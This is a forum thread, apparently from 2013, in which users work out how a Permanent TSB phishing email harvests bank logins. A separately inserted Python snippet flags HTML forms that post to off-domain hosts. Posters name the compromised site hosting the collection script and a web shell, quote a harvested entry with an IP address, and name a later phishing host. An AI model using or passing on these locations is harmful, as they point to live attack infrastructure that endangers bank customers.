
Permanent TSB phishing email - how does it work

  • 17-08-2013 11:06am
    #1
    Registered Users, Registered Users 2 Posts: 5,916 ✭✭✭


    Hi,

    Got a new phishing email about Permanent TSB - the submit button in the HTML attachment brings you to:

    www.liuzhenhui.net/wp-content/plugins/thumb/js/binisor.php

    Which appears to bring me to the real Permanent TSB page.

    If it's bringing you to the real page how is it gathering data?

    Thanks


Comments

  • Closed Accounts Posts: 18,268 ✭✭✭✭uck51js9zml2yt


    Hi,

    Got a new phishing email about Permanent TSB - the submit button in the HTML attachment brings you to:

    www.liuzhenhui.net/wp-content/plugins/thumb/js/binisor.php

    Which appears to bring me to the real Permanent TSB page.

    If it's bringing you to the real page how is it gathering data?

    Thanks

    how do you know it's the real page


  • Registered Users, Registered Users 2 Posts: 5,916 ✭✭✭podgeandrodge


    Not sure what you mean by ''pavet''? If you mean how do I know it's the real website I don't. But the link brings you to what appears to be PTSB main site and links to open24 appear to be correct in the address bar ....not that I'd try logging on with correct details!


  • Registered Users, Registered Users 2 Posts: 9,514 ✭✭✭TheChizler


    Was this the one about breaking their terms and conditions or something?


  • Closed Accounts Posts: 9,700 ✭✭✭tricky D


    Why did you even open the attachment???

    (unless in a VM)


  • Registered Users, Registered Users 2 Posts: 5,916 ✭✭✭podgeandrodge


    tricky D wrote: »
    Why did you even open the attachment???

    (unless in a VM)

    Because I'm stupid and figured (stupidly on mature reflection) that the html would be safe and the only risk would be typing in my bank details. :)


  • Closed Accounts Posts: 9,700 ✭✭✭tricky D


    Naughty boy.

    I must not open untrusted attachments ever except in a VM or email client which enables view source text.
    Centurion wrote:
    Now, write it out a hundred times. Hail Caesar! And if it's not done by sunrise, I'll cut your balls off.

    :)
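
The original question, how a form that ends up on the real bank page can still gather data, can be answered from the attachment's source without rendering it: the fields are submitted to whatever URL the form's `action` names before any redirect happens. This is an added example, not part of any post in this thread; the sample HTML is constructed, and the trusted-domain list is an assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the domains the bank's real login form is served from.
TRUSTED = {"permanenttsb.ie", "open24.ie"}

# Constructed sample standing in for the attachment (not the real file).
SAMPLE = """<html><body>
<form method="post" action="http://hacked-blog.example/wp-content/plugins/x/collect.php">
<input type="text" name="open24_number">
<input type="password" name="password">
<input type="text" name="pan">
<input type="submit" value="Continue">
</form></body></html>"""

class FormAudit(HTMLParser):
    """Collect each form's action URL and the names of the fields it submits."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag in ("input", "select", "textarea") and self.forms and a.get("name"):
            self.forms[-1]["fields"].append(a["name"])

def is_trusted(host):
    """Exact or subdomain match only, so open24.ie.evil.example is rejected."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in TRUSTED)

def audit(html):
    """Return, per form, the host it posts to, its fields and an off-domain flag."""
    parser = FormAudit()
    parser.feed(html)
    parser.close()
    return [{"host": urlparse(f["action"]).hostname,
             "fields": f["fields"],
             "off_domain": not is_trusted(urlparse(f["action"]).hostname)}
            for f in parser.forms]

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

A form with a relative or empty `action` has no host and is also flagged, which is the safe default for a file received by email.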


  • Registered Users, Registered Users 2 Posts: 1,110 ✭✭✭Skrynesaver


    I think it redirects based on user agent string, a friend got a link to it in a text to his phone last night which when followed brought up a "please supply your details so we can unlock your open24 access" page, curiously Safari had no location bar enabled...

    Though trying wget with an iPhone user agent string redirects, so they may have only been open for business for a brief window


  • Registered Users, Registered Users 2 Posts: 5,916 ✭✭✭podgeandrodge


    Can anyone confirm that I've got away with it and not been infected with some mad plague?!


  • Registered Users, Registered Users 2 Posts: 387 ✭✭fartyarse


    Can anyone confirm that I've got away with it and not been infected with some mad plague?!

    Nope...


  • Closed Accounts Posts: 18,268 ✭✭✭✭uck51js9zml2yt


    Run an updated antivirus software and Malwarebytes if you have it....and then destroy your machine to make sure the virus is gone..

    Here's how to do it http://www.gizmodo.com.au/2013/07/us-government-destroys-170000-of-hardware-in-absurd-effort-to-stop-malware/ :D


  • Site Banned Posts: 25 Leader of the Furlings


    Can anyone confirm that I've got away with it and not been infected with some mad plague?!
    You got away with it...most likely.

    No point pissing off your Anti-Virus when it's your log-in they're after.


    That's not to say you didn't catch Bacterial Resistant Gonorrhea though.


  • Registered Users, Registered Users 2 Posts: 367 ✭✭900913


    Some people have filled their details into it.

    <snip>

    There is also a shell in the thumb dir

    www.liuzhenhui.net/wp-content/plugins/thumb/


  • Registered Users, Registered Users 2 Posts: 4,026 ✭✭✭0ph0rce0


    900913 wrote: »
    Some people have filled their details into it.

    <snip>

    haha

    IP: 86.47.45.244
    Open24 number: **** off
    Name: go **** yourself
    Password: ****your mother
    PAN: ****yo
    Mobile: ****off****of


  • Registered Users, Registered Users 2 Posts: 9,514 ✭✭✭TheChizler


    0ph0rce0 wrote: »
    haha

    IP: 86.47.45.244
    Open24 number: **** off
    Name: go **** yourself
    Password: ****your mother
    PAN: ****yo
    Mobile: ****off****of

    I suppose they have gained some information from that, someone in Mullingar has a potty-keyboard.


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    900913 wrote: »

    There is also a shell in the thumb dir

    www.liuzhenhui.net/wp-content/plugins/thumb/

    Zhenhui.

    Sounds Swedish...


  • Registered Users, Registered Users 2 Posts: 1,326 ✭✭✭snowstreams


    It's moved onto pitman trucks now http://www.pitmantrucks.com.au/

    So this scam will prob keep running for another while.

    binisor is Romanian for "pretty good" I think. So I wonder if the scam originated in Romania.

